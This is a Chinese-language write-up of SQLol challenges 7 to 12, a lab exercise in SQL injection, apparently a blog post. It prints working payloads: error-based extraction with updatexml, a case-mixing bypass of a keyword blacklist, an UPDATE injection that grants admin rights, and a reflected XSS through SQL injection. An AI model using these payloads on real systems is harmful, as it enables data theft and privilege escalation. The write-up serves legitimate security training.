SQLol-Challenges writeup(二)-安全小百科

接着上一篇，继续来进行sqlolchallenge~

Challenge 7 – Walking on Thin Ice

Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT deleting anything from the database.
(If you do happen to destroy the database, you can always use the SQLol reset button to bring it back to its original state.)

找寻社保号码，但是不能删除任何东西。

其实后面的几条由于没有回显，导致我们必须进行fuzz

根据题目来说，由于是delete query，因此我们可以大概猜到sql语句为

DELETE FROM users WHERE username = ‘[1]’

[1]处即为我们填写的

answer：’ or updatexml(1,concat(0x7e,select concat(name,ssn) from ssn),0) or’

Challenge 8 – Black Comedy

Your objective is to find the table of social security numbers present in the database and extract its information.

这里开始有过滤了，不过过滤等级为low

$blacklist_low = ‘select,from,1=1,–,union,#’;

这是low等级过滤的一些语句，尝试一下大小写绕过。。

初步尝试：1′ And 1=2 Union Select concat(name,ssn)from ssn

这里大小写绕过，都能成功，但是由于过滤了or，在语句结尾不能顺利闭合

Query (injection string is underlined): SELECT username FROM users WHERE username = ‘1′ And 1=2 Union Select concat(name,ssn)from ssn‘ GROUP BY username ORDER BY username ASC

因此这里我们需要想办法来闭合最后的单引号

这里我采用的办法是在最后再构造一个选择语句来闭合最后的单引号

answer：1′ And 1=2 Union Select concat(name,ssn)from ssn Union Select null From users Where username=’

最后显示

Query (injection string is underlined): SELECT username FROM users WHERE username = ‘1′ And 1=2 Union Select concat(name,ssn)from ssn Union Select null From users Where username=’‘ GROUP BY username ORDER BY username ASC
Array ( [username] => Chunk MacRunfast666-67-6776 )
Array ( [username] => Herp Derper012-34-5678 )
Array ( [username] => Peter Weiner111-22-3333 )
Array ( [username] => SlapdeBack LovedeFace999-99-9999 )
Array ( [username] => Wengdack Slobdegoob000-00-1112 )

Challenge 9 – Administrative Tasks

Your objective is to inject into the query and cause it to update the “isadmin” field to 1 for the user with id 3.

进入数据库然后将id为3的用户设置为isadmin（初始所有id的人isadmin均为0）

初步尝试了下出现了报错语句
Query (injection string is underlined): UPDATE users SET username = ‘1″‘ WHERE isadmin = 0

answer：’ ,isadmin= 1 where id=3#

最终显示

Query (injection string is underlined): UPDATE users SET username = ‘‘ ,isadmin= 1 where id=3#‘ WHERE isadmin = 0

Challenge 10 – No WHERE

Your objective is to obtain the social security numbers from the database.

这里注入的column，因为会显示查询语句，因此这条难度其实不是很大
Query (injection string is underlined): SELECT 123 FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC

直接把后面语句注释掉不就行了。。。。

answer：concat(name,0x7e,ssn) from ssn#

Challenge 11 – No WHERE 2

这里跟上题一样，不过注入的位置变了。。

初步尝试了下。。注入语句在最后。。只能报错注入了~
Query (injection string is underlined): SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 123 ASC

answer：1 and updatexml(1,(select concat(name,0x7e,ssn) from ssn),0)#

Challenge 12 – XSSQLi

Your objective is to use an SQL injection flaw to execute a reflected cross-site scripting attack.

大意就是用sql注入漏洞来执行xss攻击~又是没回显。。。

answer:1′ and <script>alert(1)</script>#